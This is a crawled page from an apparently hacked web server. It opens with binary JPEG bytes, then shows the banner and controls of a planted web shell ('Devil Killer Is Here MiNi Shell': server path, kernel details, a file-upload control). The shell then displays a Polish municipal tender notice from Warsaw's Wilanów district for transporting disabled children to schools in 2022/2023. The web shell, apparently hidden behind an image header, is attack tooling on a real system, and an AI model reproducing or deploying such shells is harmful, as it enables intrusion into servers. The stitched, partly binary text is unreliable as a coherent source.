JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220628/0022651001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2022/2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Wilanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Klimczaka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wilanow.zzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wilanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2022/2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6095a41b-f60d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00226510</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000252/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2021/2022 w Dzielnicy Wilanów m.st. Warszawa.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo<br/>aplikacyjne do przekazania danych dotyczące systemu https://zamowienia.um.warszawa.pl:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google<br/>Chrome lub MS Edge;<br/>• włączona obsługa JavaScript;<br/>• zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf<br/>Format kodowania i oznaczania czasu:<br/>• plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert;<br/>• oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem<br/>Głównego Urzędu Miar.<br/>Wymagania sprzętowo-aplikacyjne w zakresie podpisywania ofert:<br/>W przypadku składania oferty w formie elektronicznej (podpisywania dokumentów kwalifikowanym<br/>podpisem elektronicznym), Wykonawca musi posiadać:<br/>• Kwalifikowany podpis elektroniczny osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce obsługa JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host<br/>• Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego. Prawidłowość<br/>zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu<br/>przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów podpisem<br/>osobistym), wykonawca musi posiadać:<br/>• E-dowód osobisty osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce opcja obsługi JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host;<br/>• Zainstalowane oprogramowanie do obsługi e-dowodu E-dowód menadżer dostępne na stronie<br/>https://www.gov.pl/web/e-dowod;<br/>• Podłączony lub wbudowany w komputer czytnik karty e-dowód.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace,<br/>po kliknięciu przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów profilem zaufanym),<br/>wykonawca musi posiadać:<br/>• Profil zaufany osoby składającej ofertę w Systemie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, ze zm. 3) ),zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, do upływu terminu do ich wniesienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">29/WOW/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 507406,29 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dowóz dzieci niepełnosprawnych do placówek oświatowych w roku szkolnym 2022/2023.<br/>Szczegóły realizacji przedmiotu zamówienia zostały określone w dokumentach zamówienia<br/>w szczególności w opisie przedmiotu zamówienia stanowiącym Załącznik nr 6 do SWZ oraz wzorze umowy stanowiącym<br/>Załącznik nr 8 do SWZ. Usługi winny być zrealizowane z poszanowaniem obowiązujących przepisów prawa oraz<br/>standardów realizacji usługi, w oparciu o dokumenty zamówienia.<br/>Niniejsze zamówienie obejmuje świadczenie usług transportu 28 dzieci, przy czym Zamawiający dopuszcza możliwość<br/>zwiększenia zakresu usługi (w ramach opcji) o 5 dzieci do maksymalnie 33 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający w ramach realizacji przedmiotowego zamówienia dopuszcza możliwość (opcję) zwiększenia liczby dowożonych dzieci do maksymalnie 33 osób. Opcja zwiększenia liczby dowożonych dzieci o 5 dotyczy dowozu do szkół i placówek oświatowych dzieci w okresie od 1 września 2022 r. do 31 sierpnia 2023 r. i będzie miała zastosowanie w przypadkach zgłoszenia przez rodziców nowych<br/>dzieci do dowozu. Zamawiający zwiększając liczbę dzieci objętych dowozem, przekaże stosowną informację Wykonawcy. W przypadku zgłoszenia dziecka w trakcie trwania roku szkolnego odpłatność za jego przewóz dotyczyć będzie okresu od daty rozpoczęcia dowozu do 31 sierpnia 2023 r. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określony w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średni rok produkcji pojazdów przeznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie opiekunów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na potwierdzenie spełnienia warunku udziału:<br/>1 dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>a. Wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego w zakresie<br/>przewozu osób, o której mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2022 r. poz. 180 ze<br/>zm.), obejmującą co najmniej obszar wskazany w opisie przedmiotu zamówienia.<br/>2 dotyczących zdolności technicznej lub zawodowej:<br/>a. Dysponuje lub dysponować będzie co najmniej 5 oznakowanymi samochodami przystosowanymi do przewozu osób<br/>niepełnosprawnych poruszających się na wózkach inwalidzkich, w celu zapewnienia jakości wykonywania usługi,<br/>Wykonawca wykaże, że dysponuje lub będzie dysponować ww. pojazdami wyprodukowanymi nie wcześniej niż w 2016 r.<br/>Wykonawca zobowiązuje się do zapewnienia, w ramach jednostek sprzętowych wskazanych powyżej, odpowiedniej liczby<br/>pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym, zgodnie z ustawą z dnia 11 stycznia 2018 r. o<br/>elektromobilności i paliwach alternatywnych . Zgodnie z aktualnym brzmieniem art. 68 ust. 3 ustawy o elektromobilności i<br/>paliwach alternatywnych, począwszy od dnia 1 stycznia 2022 r udział pojazdów elektrycznych lub pojazdów zasilanych<br/>gazem ziemnym wynosi co najmniej 10% łącznej liczby pojazdów użytkowanych do realizacji zamówienia.<br/>Pojazdy, którymi będą wykonywane usługi przewozowe muszą spełniać warunki określone<br/>w opisie przedmiotu zamówienia, stanowiącym Załącznik nr 6 do SWZ.<br/>UWAGA<br/>Pojazdy, o których mowa powyżej nie mogą być wykorzystywane do transportu pacjentów szpitalnych lub transportu osób<br/>dializowanych, lub transportu materiału biologicznego.<br/>Nie dopuszcza się transportu dzieci samochodami sanitarnymi, karetkami, które zajmują się<br/>przewożeniem pacjentów szpitalnych lub osób dializowanych, lub transportem materiału biologicznego.<br/>Usługa nie pełni funkcji transportu sanitarnego i w związku z tym nie jest świadczona dla osób wymagających przewozu w<br/>pozycji leżącej. Pojazdy, w których transport osób może odbywać się tylko w pozycji leżącej nie spełniają wymagań<br/>Zamawiającego, transport dzieci takimi pojazdami Zamawiający uznaje za niedopuszczalny.<br/>b. W okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wykonał lub wykonuje należycie co najmniej jedną usługę o wartości wynoszącej co najmniej 250.000,00 zł<br/>brutto, polegającą na przewozie osób niepełnosprawnych.<br/>W przypadku gdy przedmiotem Zamówienia są świadczenia powtarzające się lub ciągłe, dopuszcza się wykazanie nie tylko<br/>zamówień wykonanych (zakończonych), ale również wykonywanych. W takim przypadku, Zamawiający uzna warunek za<br/>spełniony, jeżeli część usługi już wykonanej spełnia wymagania określone przez Zamawiającego powyżej (o wartości<br/>zrealizowanej części zamówienia wynoszącej co najmniej 250.000,00 zł brutto).<br/>c. Dysponuje lub dysponować będzie co najmniej 5 kierowcami, którzy posiadają odpowiednie uprawnienie do kierowania<br/>pojazdem samochodowym, określone w ustawie z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. z 2021 r. poz.<br/>1212 ze zm.). UWAGA<br/>Zamawiający informuje, że w związku z ustawą z dnia 13 maja 2016 roku o przeciwdziałaniu zagrożeniom przestępczością<br/>na tle seksualnym (Dz.U. z 2020 r. poz. 152), Zamawiający będzie wymagał od Wykonawcy spełnienia ciążącego na nim<br/>obowiązku, o którym mowa<br/>w art. 21 przedmiotowej ustawy.<br/>(Art. 21. ust. 1 Przed nawiązaniem z osobą stosunku pracy lub przed dopuszczeniem osoby do innej działalności związanej<br/>z wychowaniem, edukacją, wypoczynkiem, leczeniem małoletnich lub z opieką nad nimi pracodawcy lub inni organizatorzy w<br/>zakresie takiej działalności są obowiązani do uzyskania informacji, czy dane tej osoby są zamieszczone w Rejestrze z<br/>dostępem ograniczonym lub w Rejestrze osób, w stosunku do których Państwowa Komisja do spraw wyjaśniania<br/>przypadków czynności skierowanych przeciwko wolności seksualnej i obyczajności wobec małoletniego poniżej lat 15<br/>wydała postanowienie o wpisie w Rejestrze.).<br/>d. Dysponuje lub dysponować będzie co najmniej 5 osobami do opieki nad dziećmi (opiekunami), którzy posiadają<br/>udokumentowane przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej i co najmniej 6<br/>miesięczne udokumentowane doświadczenie w opiece nad osobami niepełnosprawnymi.<br/>UWAGA<br/>Zamawiający informuje, że w związku z ustawą z dnia 13 maja 2016 roku o przeciwdziałaniu zagrożeniom przestępczością<br/>na tle seksualnym (tj. Dz.U. z 2020 r. poz. 152), Zamawiający będzie wymagał od Wykonawcy spełnienia ciążącego na nim<br/>obowiązku, o którym mowa<br/>w art. 21 przedmiotowej ustawy.<br/>(Art. 21. ust 1 Przed nawiązaniem z osobą stosunku pracy lub przed dopuszczeniem osoby do innej działalności związanej z<br/>wychowaniem, edukacją, wypoczynkiem, leczeniem małoletnich lub z opieką nad nimi pracodawcy lub inni organizatorzy w<br/>zakresie takiej działalności są obowiązani do uzyskania informacji, czy dane tej osoby są zamieszczone w Rejestrze z<br/>dostępem ograniczonym lub w Rejestrze osób, w stosunku do których Państwowa Komisja do spraw wyjaśniania<br/>przypadków czynności skierowanych przeciwko wolności seksualnej i obyczajności wobec małoletniego poniżej lat 15<br/>wydała postanowienie o wpisie w Rejestrze.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzenia aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w III.C.1.2)a) SWZ w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego - wg wzoru stanowiącego Załącznik nr 7 do SWZ.<br/>W przypadku podmiotów występujących wspólnie dokument składa każdy Wykonawca.<br/>W przypadku Wykonawcy, który powołuje się na zasoby innych podmiotów w celu wykazania braku istnienia wobec nich podstaw<br/>wykluczenia, wymóg złożenia niniejszego oświadczenia dotyczy każdego z podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane,<br/>a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - wg wzoru stanowiącego Załącznik nr 9 do SWZ.<br/>2. Wykaz osób - kierowców skierowanych przez wykonawcę do realizacji zamówienia publicznego w zakresie kierowania pojazdami,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami, w zakresie wymaganym w punkcie III.B.2.4) SWZ – wykaz kierowców stanowi załącznik<br/>nr 11 do SWZ.<br/>Wykaz osób należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do 